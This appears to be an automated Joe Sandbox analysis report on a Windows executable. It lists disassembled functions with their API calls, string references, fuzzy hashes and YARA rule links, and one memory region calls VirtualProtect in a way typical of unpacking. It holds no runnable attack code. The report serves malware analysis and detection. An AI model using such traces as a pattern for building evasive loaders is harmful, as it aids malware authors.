Opcode Fuzzy Hash: 81dace6de5dd33ee5a43509eaab52de1f3040316adbf9ff5ea26c4ddc0249c15
Instruction Fuzzy Hash: B2F01972800209BFEB117BA1DD468BEBBBDEF40311710647AF89192171DB71AD91DBA4

Function 00438B0F Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

GetWindowExtEx.GDI32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 00438B20
GetViewportExtEx.GDI32(?,?,?,?,?,?,?,00000000,00000000), ref: 00438B2D
MulDiv.KERNEL32(?,00000000,00000000), ref: 00438B52
MulDiv.KERNEL32(00000002,00000000,00000000), ref: 00438B6D

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ViewportWindow
String ID:
API String ID: 1589084482-0
Opcode ID: 8e2c2e3d83b4838951bd84225f31b6872ab6b9f1a4365ad2ca7b71e7e1b936a9
Instruction ID: a8eceb2146f2bd16488e7b2bf70c0b8b9714bac3add3f66989ddb9caefdcff02
Opcode Fuzzy Hash: 8e2c2e3d83b4838951bd84225f31b6872ab6b9f1a4365ad2ca7b71e7e1b936a9
Instruction Fuzzy Hash: 9FF01972800209BFEB117BA1DD468BEBBBDEF40311710647AF89192171DB71AD91DBA4

Function 0044C34E Relevance: 6.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 0044C358
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,0044D0D1,00000000), ref: 0044C370
SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 0044C378
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,0044D0D1,00000000), ref: 0044C38D

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Byte$CharMultiStringWide$Alloc
String ID:
API String ID: 3384502665-0
Opcode ID: eb9397d2c895e227fe62fbbb7977c397e0d3266c4695e26ffe0be20e811927cd
Instruction ID: f713cb5c44f4f3ff602e0e49c02879ef198cc7c4e71942830f4dc890fab1828b
Opcode Fuzzy Hash: eb9397d2c895e227fe62fbbb7977c397e0d3266c4695e26ffe0be20e811927cd
Instruction Fuzzy Hash: 3EF012761062287F92205B57DC4CCFB7FDCFE8B2BAB01452AF54882101D675A800CBF5

Function 00450F5A Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

GetViewportOrgEx.GDI32(?,?), ref: 00450F75

Part of subcall function 0045105C: GetViewportExtEx.GDI32(?,?,?,?,?,00450F86,?), ref: 0045106D
Part of subcall function 0045105C: GetWindowExtEx.GDI32(?,?,?,?,?,00450F86,?), ref: 0045107A

SetViewportOrgEx.GDI32(00000000,?,00000000,00000000), ref: 00450F9D
GetWindowOrgEx.GDI32(?,?), ref: 00450FAA
SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 00450FBB

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ViewportWindow
String ID:
API String ID: 1589084482-0
Opcode ID: 4118bef858f401afc621ea4fc9d3861fa4d5febe30ba06de2d75b2ad90bceca6
Instruction ID: feb0e29bcd78d05d20321328cb3e541cc07cd89c8f9924eeb1d59023c3483b7d
Opcode Fuzzy Hash: 4118bef858f401afc621ea4fc9d3861fa4d5febe30ba06de2d75b2ad90bceca6
Instruction Fuzzy Hash: 5F018B35900B08FFCF209BA4CC09BAEBBB8FF08711F004469F556A22A1D770E910DB48

Function 0044470F Relevance: 6.0, APIs: 4, Instructions: 37COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000021), ref: 0044473E
GetSystemMetrics.USER32(00000005), ref: 00444752
InflateRect.USER32(?,00000000), ref: 0044475A

Part of subcall function 004324A0: AdjustWindowRectEx.USER32(?,00000000,00000000,00000000), ref: 004324C1

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MetricsRectSystem$AdjustInflateWindow
String ID:
API String ID: 4080371637-0
Opcode ID: 9ce5d6c0316eabeb975e1a079092b0651b7c69da4316e2f8fb5a6073d2e507b3
Instruction ID: dc9341ab11dfe3f085e1f01deb9efc283bfb756304806e95483621e02950f747
Opcode Fuzzy Hash: 9ce5d6c0316eabeb975e1a079092b0651b7c69da4316e2f8fb5a6073d2e507b3
Instruction Fuzzy Hash: 02F024769043107FF2019BA49C50B7B7B68EFC1762F65802BF64857251C7749C02CB9A

Function 00436EEF Relevance: 6.0, APIs: 4, Instructions: 37windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004393BC
DestroyMenu.USER32(?,?,?,?,00436EDB), ref: 004393DB
DestroyMenu.USER32(?,?,?,?,00436EDB), ref: 004393E5
DestroyMenu.USER32(?,?,?,?,00436EDB), ref: 004393EF

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: DestroyMenu$H_prolog
String ID:
API String ID: 750541241-0
Opcode ID: 345f1c9b2c141b48d1ee37d63c3f981bf0bbd9b4e59d020addcf1575efd0996f
Instruction ID: 8146db0c0aef19811f05146fb6d1bfce58d869c88b1bbd8f1c4376d559a823ab
Opcode Fuzzy Hash: 345f1c9b2c141b48d1ee37d63c3f981bf0bbd9b4e59d020addcf1575efd0996f
Instruction Fuzzy Hash: 4FF0AF71A00614DBCB20AF6AD840A6BB3E8EF48715F00452FE412D3A80CBB8ED008A54

Function 00443B65 Relevance: 6.0, APIs: 4, Instructions: 36COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000021), ref: 00443B8E
GetSystemMetrics.USER32(00000005), ref: 00443BA6
InflateRect.USER32(?,00000000), ref: 00443BB0

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MetricsSystem$InflateRect
String ID:
API String ID: 437325472-0
Opcode ID: c9bd7016fdb5a14ad890b05f3cc9c68bc1d1880016098e670b4d4882a698d884
Instruction ID: ae7178d7f0de343bb64af2feb52a63d0d01a067597d2049232188bb7b7ba6f0e
Opcode Fuzzy Hash: c9bd7016fdb5a14ad890b05f3cc9c68bc1d1880016098e670b4d4882a698d884
Instruction Fuzzy Hash: 62F0E972A84754AFF2106F549C11F3B2358DF40F16F15402BF90597183C7687C01CAAE

Function 00406560 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

WindowFromDC.USER32(?), ref: 00406573
GetWindowRect.USER32(00000000,?), ref: 0040658B
CopyRect.USER32(?,?), ref: 00406596
OffsetRect.USER32(?,?,?), ref: 004065A7

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Rect$Window$CopyFromOffset
String ID:
API String ID: 2700617375-0
Opcode ID: 3003ed0b7a8f3a552176e42d1df2cc95d7fa842108165087df77c6300a097a09
Instruction ID: 394610e25fc8b17ae6141c04fdaacc50b1057307de06197cefb34879a46ac3f5
Opcode Fuzzy Hash: 3003ed0b7a8f3a552176e42d1df2cc95d7fa842108165087df77c6300a097a09
Instruction Fuzzy Hash: 7DF05E75201650AFD710AF18DC58DABB7BCEEC4601B858A2AF859D3211E738E8158769

Function 004390A2 Relevance: 6.0, APIs: 4, Instructions: 29stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 004390AF
GetWindowTextA.USER32(?,?,00000100), ref: 004390CB
lstrcmpA.KERNEL32(?,?), ref: 004390DF
SetWindowTextA.USER32(?,?), ref: 004390EF

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: TextWindow$lstrcmplstrlen
String ID:
API String ID: 330964273-0
Opcode ID: 5139420faddb2a0bba099e370c1430d03e3c1e7a67a17fb5f63b80b0f0386428
Instruction ID: c2b26089067c26d6e9c2aea4958cefab5b3870dbcfed28427c87fe6dc7189b51
Opcode Fuzzy Hash: 5139420faddb2a0bba099e370c1430d03e3c1e7a67a17fb5f63b80b0f0386428
Instruction Fuzzy Hash: 85F01C35500619ABCF226F64DC48AEE7B7DFB08391F048026F89AD5120E7B4DE94CB98

Function 004420C0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 00442109: GetStockObject.GDI32(00000000), ref: 0044211F
Part of subcall function 00442109: InflateRect.USER32(?,000000FF,000000FF), ref: 004421C3

ReleaseCapture.USER32 ref: 004420CB
GetDesktopWindow.USER32 ref: 004420D1
LockWindowUpdate.USER32(00000000,00000000,?,004424BF,00000000), ref: 004420E1
ReleaseDC.USER32(?,?), ref: 004420FD

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
String ID:
API String ID: 1260764132-0
Opcode ID: 3844e7c5000c5c50ca49394ba436dec886eab3f35d4b83429ccdd9345ea70c65
Instruction ID: 7b0d05184a800ac82c0096e63e09174609394c3a742442a7a440b5a884415b58
Opcode Fuzzy Hash: 3844e7c5000c5c50ca49394ba436dec886eab3f35d4b83429ccdd9345ea70c65
Instruction Fuzzy Hash: EFE09A32500710ABE7102B71FD1DB6A7AA4BF40312F19443AF609861A3DAB4C800CB98

Function 0044C2BA Relevance: 6.0, APIs: 4, Instructions: 21COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0044C2DC
GetTickCount.KERNEL32 ref: 0044C2E9
CoFreeUnusedLibraries.OLE32 ref: 0044C2F8
GetTickCount.KERNEL32 ref: 0044C2FE

Part of subcall function 0044C25F: CoFreeUnusedLibraries.OLE32(00000000), ref: 0044C2A7
Part of subcall function 0044C25F: OleUninitialize.OLE32 ref: 0044C2AD

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CountTick$FreeLibrariesUnused$Uninitialize
String ID:
API String ID: 685759847-0
Opcode ID: fac113011496050922b2b121bf667caad0eb88c69d6ef21fd10ce3186f97ff55
Instruction ID: 932fceeb97bab8964b0f0ec84bb3429670f2e976f89686b444022dfe43262999
Opcode Fuzzy Hash: fac113011496050922b2b121bf667caad0eb88c69d6ef21fd10ce3186f97ff55
Instruction Fuzzy Hash: 89E06D31D16210CAEF50BF61EC8462A3B64FB06321F18847BD408521A0D6F85C40CF4F

Function 00414CA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00414CAD
VariantClear.OLEAUT32(?), ref: 00414E32

Strings

@, xrefs: 00414CFA

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ClearH_prologVariant
String ID: @
API String ID: 1166855276-2766056989
Opcode ID: 760248db876601b02c3eff388c6d3df689ec10ab84f598e8bd553499752ab01f
Instruction ID: a5a2970690c396abdbcf34ae8032788ab27bc7c6df12c4e4f87aa2e54e7266d7
Opcode Fuzzy Hash: 760248db876601b02c3eff388c6d3df689ec10ab84f598e8bd553499752ab01f
Instruction Fuzzy Hash: E151B271E002199FDB04CFA9C888AEEB7F9FF48305F20456AE516EB251EB74A945CF50

Function 0041B967 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,00000000), ref: 0041B97B

Strings

, xrefs: 0041B9A0
, xrefs: 0041B9C4

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: a51460fe3c6bf455025de59cbe2f30e79616b8b4487f85150325ea85a90a3716
Instruction ID: ccff92b21185bb484c662e792c5bbbe51961fe1d31f0a6b5291d1564d463ae56
Opcode Fuzzy Hash: a51460fe3c6bf455025de59cbe2f30e79616b8b4487f85150325ea85a90a3716
Instruction Fuzzy Hash: 3C4158312082585AEB118724EC59BEB3FA9DF06780F1404F6D5C9D6153D3694989CBEB

Function 0043DF0E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109windowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043DF13
SendMessageA.USER32(?,00000364,00000000,00000000), ref: 0043E024

Strings

zE, xrefs: 0043DF71

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: H_prologMessageSend
String ID: zE
API String ID: 2337391251-342539153
Opcode ID: ffb509adae05d2a61d746eede5fb55160dc5611c07ba5130586c0113dfcda031
Instruction ID: 480e82d80b913186859324ce7515231c932c5714007c67dbf53df131e5a4c4e5
Opcode Fuzzy Hash: ffb509adae05d2a61d746eede5fb55160dc5611c07ba5130586c0113dfcda031
Instruction Fuzzy Hash: 4E410671A00209AFCB14DF5AD8849AFBBF9EF88310F10851BF91197351D7789A51CF94

Function 00419878 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

IsChild.USER32(?,?), ref: 00419898
GetWindowLongA.USER32(?,000000EC), ref: 004198AF

Strings

0, xrefs: 00419924

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ChildLongWindow
String ID: 0
API String ID: 1178903432-4108050209
Opcode ID: 35db5e9b4f47fdce2d7a9f8ecb9698f4069c44b9a05ee68873cb61cc8f3debed
Instruction ID: e1f78a0715df26aca3d050e25c151d1e236b6b3a8bd5c3c6a7550c7108e9782b
Opcode Fuzzy Hash: 35db5e9b4f47fdce2d7a9f8ecb9698f4069c44b9a05ee68873cb61cc8f3debed
Instruction Fuzzy Hash: CC21F7B1135205B6EB256A259C61BFF67AC9F41B69F24401FFC11A23C2EB2DDDC0816C

Function 00431498 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 0044B5DB: LeaveCriticalSection.KERNEL32(?,0044B1EF,00000010,00000010,?,00000000,?,?,?,0044910D,0044915A,0044879C,00449113,0043427A,00436840), ref: 0044B5F3

Part of subcall function 0041AA2B: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0041AB45,00000000), ref: 0041AA59

wsprintfA.USER32 ref: 004314DE
wsprintfA.USER32 ref: 004314FA
GetClassInfoA.USER32(?,-00000058,?), ref: 00431509

Strings

Afx:%x:%x, xrefs: 004314D8

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: wsprintf$ClassCriticalExceptionInfoLeaveRaiseSection
String ID: Afx:%x:%x
API String ID: 2529146597-2071556601
Opcode ID: 7433cc8b8fe25b9399a21c8c92c5bcfb4c4f7206b45a28713b10532771963207
Instruction ID: 670ecb09de6af2607b68e7f1afdfb90f10ee06646ff9e038b0f1514b677fdae3
Opcode Fuzzy Hash: 7433cc8b8fe25b9399a21c8c92c5bcfb4c4f7206b45a28713b10532771963207
Instruction Fuzzy Hash: 6A112170900209AF9B10DF95C9819EE7BB8EF58359F00542FF909E3251E7789951CBA9

Function 02502430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 02502468
VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 025024B2

Strings

@, xrefs: 02502453

Memory Dump Source

Source File: 00000000.00000002.1492413243.0000000002501000.00000020.00001000.00020000.00000000.sdmp, Offset: 02501000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2501000_ExeFile (360).jbxd

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: 195fef30413999eb1a539426dfe76283a9426d607909371c13f2cd0e31b783ab
Instruction ID: 6647843e461a068b78df5766fa9895fb4359b1d7560cf9108c6bfcbeee7c6584
Opcode Fuzzy Hash: 195fef30413999eb1a539426dfe76283a9426d607909371c13f2cd0e31b783ab
Instruction Fuzzy Hash: D621B9B0D04209EFDF14CF94C9C4BADBBB5BF44304F208599DD09A7284D774AA84DB59

Function 00444B9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(?,mdiclient,00000000,56800001,00000000,00000000,00000000,00000000,?,0000E900,?,?), ref: 00444C1B
BringWindowToTop.USER32(00000000), ref: 00444C33

Strings

mdiclient, xrefs: 00444C13

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$BringCreate
String ID: mdiclient
API String ID: 3919611474-1999401180
Opcode ID: d77c20e2b9e9a95b41b3982f4ddcc5b33a82b806556fd946812976e9d5107f17
Instruction ID: c5d4292c3b67314fce7954a70404c08eb373236d1ad393dd2717e5c83b898768
Opcode Fuzzy Hash: d77c20e2b9e9a95b41b3982f4ddcc5b33a82b806556fd946812976e9d5107f17
Instruction Fuzzy Hash: 27116D71A00248BFEB209B95CC89F6FBBB9EB84714F10846AF501D6251DAB4AD05CB64

Function 004056C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(?,Dial-up watch,?), ref: 004056FC
GetClassInfoA.USER32(?,?,?), ref: 0040570C

Strings

Dial-up watch, xrefs: 004056F6, 00405716, 0040572D

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
